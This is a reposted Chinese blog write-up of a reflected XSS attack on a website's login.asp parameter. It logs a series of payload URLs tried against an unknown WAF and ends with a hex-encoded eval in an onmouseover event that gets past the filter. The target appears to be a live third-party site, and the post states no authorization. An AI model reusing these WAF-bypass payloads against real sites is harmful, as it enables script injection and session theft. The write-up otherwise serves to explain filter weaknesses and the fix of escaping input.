实战|一次绕过waf进行xss的经历
2023-1-6 08:10:46 Author: 系统安全运维(查看原文) 阅读量:31 收藏

今天室友遇到一个好玩的网站,下面是一些尝试绕过Waf进行XSS的记录。首先该网站没有对左右尖号和单双引号做任何过滤或转义。且有未知的waf或者其他阻止恶意访问的手段。

首先我的访问为 login.asp?f=1 时候,页面关键源码为

可能是表示登录次数的一个东西?(猜测) 现在我们知道的信息是参数f会填充到 loginflag这个隐藏框内。

尝试

首先做一些基础的XSS尝试:

script标签

login.asp?f=1"><script>

直接触发waf

img标签

login.asp?f=123" <img onload="alert(x)" src="

/login.asp?f=123" <img src="

可以正常的释放引号与尖号,也可以完整释放出 img标签。但是只要和on事件搭上边,就触发了这个waf。https://www.w3schools.com/jsref/dom_obj_event.asp 这里的一些基础事件都做了尝试。无解。

iframe标签

login.asp?f=123"> <iframe SRC="https://www.baidu.com

可解,但是总觉得没有弹窗是有点不爽的意思。

继续尝试执行JS

尝试使用H标签,例如h1

可以正常放出onload事件,所以此处这个waf禁止的只是img的on事件。尝试弹窗:

login.asp?f=1"><h1 onload="alert()">Hello</h1><img src="

我们又回到了waf上面,尝试了alert、confirm、prompt都被拦截。但是可以console.log。

login.asp?f=1"><h1 onmouseover="console.log(/cxk/)">Hello</h1><img src="

这就有点再次陷入尴尬,还是没有弹窗。不过我们已经可以执行js了,可以使用eval轻松的绕过。

login.asp?f="><h1 onmouseover=eval("\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a\x61\x6c\x65\x72\x74\x28\x22\x58\x53\x53\x22\x29")>Hello</h1><img src="

总结

首先肯定是不存在大小写绕过的,不然也不会这么费劲。我们不难看出,该WAF主要针对两点做了一些手段。

  1. script标签

  2. img标签的 onXX事件

  3. onXX事件里面不能有弹窗函数 alert、confirm、prompt

治标不治本,当然针对XSS最傻瓜的处理办法还是不要放过尖号好引号。

内容来源:https://cloud.tencent.com/developer/article/1688902

文章来源:HACK之道

如有侵权,请联系删除

好文推荐

红队打点评估工具推荐
干货|红队项目日常渗透笔记
实战|后台getshell+提权一把梭
一款漏洞查找器(挖漏洞的有力工具)
神兵利器 | 附下载 · 红队信息搜集扫描打点利器
神兵利器 | 分享 直接上手就用的内存马(附下载)
推荐一款自动向hackerone发送漏洞报告的扫描器
欢迎关注 系统安全运维

文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NjE0NDc5OQ==&mid=2247514701&idx=2&sn=10c3aacbc544d601addcba52e333f78f&chksm=c308693df47fe02be253786d30e36ba3bdaf24500855df8e67f02ddef9ca3e9a922ff2dbb182#rd
如有侵权请联系:admin#unsafe.sh